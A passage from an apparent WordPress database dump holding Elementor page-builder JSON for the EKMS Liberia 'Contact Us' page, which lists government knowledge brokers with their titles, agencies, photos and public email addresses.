\\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3ef1bd5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"334f9e9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(24492,3615,'_elementor_edit_mode','builder'),(24493,3615,'_elementor_template_type','wp-page'),(24494,3615,'_elementor_version','3.0.16'),(24495,3615,'_wp_page_template','default'),(24496,3615,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer<br \\/>UNCBD Focal Point<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator<br \\/>UNFCCC Focal Point<br \\/>EPA<br \\/><a>bkarmorh@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator<br \\/>UNCCD Focal Point<br \\/>EPA<br \\/><a>bjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"be9d288\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/konikay.png\",\"id\":3601}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"17eb719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/bgoll.png\",\"id\":3596}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely BSc, MSc.<\\/strong><br \\/>EIA Manager<br \\/>FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Edward S. Kamara<\\/strong><br \\/>Marketing and Forest Forecast<br \\/>FDA<br \\/><a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll BSc, MSc.<\\/strong><br \\/>Technical Manager Conservation Department<br \\/>FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b40c80d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8bb2d6d\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7932328\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3f8a3ea\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/duolupeh.png\",\"id\":3602}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b158b68\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1894b7f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"a79d62d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"7d0d9ed\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f289365\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"1d3b712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"2a21d0a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joseph G. Duolupeh BSc, MPSM.<\\/strong><br \\/>Manager, Strategic Planning Unit<br \\/>FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6290cd1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0a0118f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><br \\/>Agricultural Economist<br \\/>MOA<br \\/><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea6ac52\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d34617b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jlopleh Dennis Wiagbe <\\/strong><br \\/>Director\\/M&amp;E<br \\/>MOA<br \\/><a href=\\\"mailto:jdmne12@gmail.com\\\">jdmne12@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"83b2935\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Halala Willie Kokulo <\\/strong><br \\/>Director\\/Crop Resources<br \\/>MOA<br \\/><a href=\\\"mailto:kokulohalala@gmail.com\\\">kokulohalala@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7332871\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Roosevelt Carlos Reeves <\\/strong><br \\/>Agricultural Mechanization Technologist<br \\/>MOA<br \\/><a href=\\\"mailto:rcreeves@gmail.com\\\">rcreeves@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"820e282\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John Willabo Johnson <\\/strong><br \\/>Assistant Minister<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"755c46b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"399f512\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"49c1380\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4032246\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"2179c05\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"713d262\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d8cbd31\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"05b84b5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"cfc0f42\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c5f9301\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"c167ff3\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f869f0a\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"309e701\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ad4abd4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"5c6f852\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4463645\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"7731dcd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"41cb42e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4b566af\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"201ee41\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager<br \\/>LLA<br \\/><a 